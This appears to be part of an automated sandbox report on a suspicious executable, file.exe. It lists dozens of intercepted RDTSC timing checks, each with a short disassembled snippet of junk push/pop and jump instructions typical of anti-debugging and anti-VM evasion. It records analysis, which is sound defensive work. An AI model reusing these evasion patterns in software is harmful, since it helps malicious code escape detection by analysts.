                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F420 second address: 57F44A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B727h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnp 00007F5B4D24B716h 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F44A second address: 57F45C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F5B4C774D88h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FA0C second address: 57FA3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5B4D24B728h 0x0000000c jne 00007F5B4D24B716h 0x00000012 jmp 00007F5B4D24B71Bh 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FA3D second address: 57FA43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FA43 second address: 57FA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FCE2 second address: 57FCEE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007F5B4C774D86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FE72 second address: 57FE98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5B4D24B729h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FFFA second address: 580016 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D98h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580016 second address: 580026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007F5B4D24B716h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580026 second address: 58002A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58002A second address: 580060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5B4D24B716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5B4D24B728h 0x00000014 jmp 00007F5B4D24B71Fh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5804E8 second address: 580522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5B4C774D96h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5B4C774D98h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580522 second address: 58053A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5B4D24B722h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58053A second address: 580554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D92h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EC29 second address: 57EC2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA45D second address: 4FA461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F7F1 second address: 58F82A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F5B4D24B716h 0x0000000c popad 0x0000000d push esi 0x0000000e jmp 00007F5B4D24B724h 0x00000013 jmp 00007F5B4D24B71Eh 0x00000018 pop esi 0x00000019 jp 00007F5B4D24B71Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58E47D second address: 58E499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F5B4C774D97h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58E499 second address: 58E4C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jno 00007F5B4D24B716h 0x0000000b popad 0x0000000c push eax 0x0000000d jo 00007F5B4D24B716h 0x00000013 pop eax 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F5B4D24B71Ch 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 pop eax 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58E4C9 second address: 58E4D3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5B4C774D86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58E4D3 second address: 58E4D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58E4D9 second address: 58E4E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58E4E0 second address: 58E4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5B4D24B716h 0x0000000a jmp 00007F5B4D24B71Ah 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 ja 00007F5B4D24B716h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58E69E second address: 58E6B0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5B4C774D86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F5B4C774D86h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58E859 second address: 58E869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5B4D24B71Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58E179 second address: 58E185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FDBFD second address: 4FDC01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594E1D second address: 594E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5B4C774D86h 0x0000000a popad 0x0000000b jbe 00007F5B4C774D92h 0x00000011 pop ecx 0x00000012 ja 00007F5B4C774DA1h 0x00000018 pushad 0x00000019 jc 00007F5B4C774D86h 0x0000001f jmp 00007F5B4C774D8Dh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594701 second address: 594709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594709 second address: 594716 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5B4C774D86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594716 second address: 59471C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5948BA second address: 5948BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59895A second address: 598960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59F372 second address: 59F378 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59F378 second address: 59F38F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5B4D24B722h 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59DD3D second address: 59DD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59DD4B second address: 59DD57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5B4D24B716h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59DE6E second address: 59DE74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552090 second address: 552096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55214C second address: 55215E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jg 00007F5B4C774D86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E558 second address: 59E55E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E55E second address: 59E564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E564 second address: 59E581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4D24B729h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E581 second address: 59E595 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D8Bh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E6EE second address: 59E6FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F5B4D24B716h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E6FC second address: 59E71B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F5B4C774D92h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E71B second address: 59E726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5B4D24B716h 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E726 second address: 59E72B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59F0AB second address: 59F0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2D11 second address: 5A2D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8AFA second address: 5A8B1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 jnp 00007F5B4D24B716h 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 jp 00007F5B4D24B71Ch 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8B1B second address: 5A8B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5B4C774D97h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8DFA second address: 5A8E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8E03 second address: 5A8E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9698 second address: 5A969C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A969C second address: 5A96AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jl 00007F5B4C774D86h 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A96AA second address: 5A96B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A96B1 second address: 5A96B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A99DA second address: 5A99FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B726h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A99FA second address: 5A9A14 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5B4C774D86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F5B4C774D86h 0x00000014 je 00007F5B4C774D86h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9A14 second address: 5A9A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9A18 second address: 5A9A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5B4C774D8Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9CD7 second address: 5A9CDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9FFF second address: 5AA01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4C774D99h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA01E second address: 5AA03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5B4D24B727h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA58C second address: 5AA590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA590 second address: 5AA5A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007F5B4D24B716h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA5A1 second address: 5AA5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA5A7 second address: 5AA5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA5AC second address: 5AA5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F5B4C774D86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0110 second address: 5B0114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0114 second address: 5B011A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B011A second address: 5B014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5B4D24B727h 0x0000000b push ebx 0x0000000c jmp 00007F5B4D24B722h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B320F second address: 5B3217 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3217 second address: 5B3228 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4D24B71Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3228 second address: 5B322C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B34EB second address: 5B34F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B34F1 second address: 5B34F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B34F6 second address: 5B350F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F5B4D24B71Bh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop ecx 0x0000000b jo 00007F5B4D24B71Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B37D2 second address: 5B37DC instructions: 0x00000000 rdtsc 0x00000002 je 00007F5B4C774D86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3C19 second address: 5B3C4F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5B4D24B716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5B4D24B722h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F5B4D24B71Fh 0x00000017 jnl 00007F5B4D24B716h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507CDD second address: 507CE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BA8D1 second address: 5BA8D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BAA7D second address: 5BAA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BAA81 second address: 5BAA97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B71Ch 0x00000007 je 00007F5B4D24B716h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BAA97 second address: 5BAAC8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5B4C774D9Eh 0x00000008 pushad 0x00000009 jno 00007F5B4C774D86h 0x0000000f push edi 0x00000010 pop edi 0x00000011 jne 00007F5B4C774D86h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BAF0A second address: 5BAF29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F5B4D24B71Bh 0x0000000c pop edx 0x0000000d jl 00007F5B4D24B718h 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BAF29 second address: 5BAF2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BAF2D second address: 5BAF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BAF33 second address: 5BAF45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BAF45 second address: 5BAF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BB336 second address: 5BB365 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5B4C774D86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F5B4C774D94h 0x00000011 pop edi 0x00000012 push eax 0x00000013 pushad 0x00000014 jne 00007F5B4C774D86h 0x0000001a push esi 0x0000001b pop esi 0x0000001c push esi 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BB617 second address: 5BB620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BB620 second address: 5BB638 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BB638 second address: 5BB640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BB640 second address: 5BB644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BB644 second address: 5BB64A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
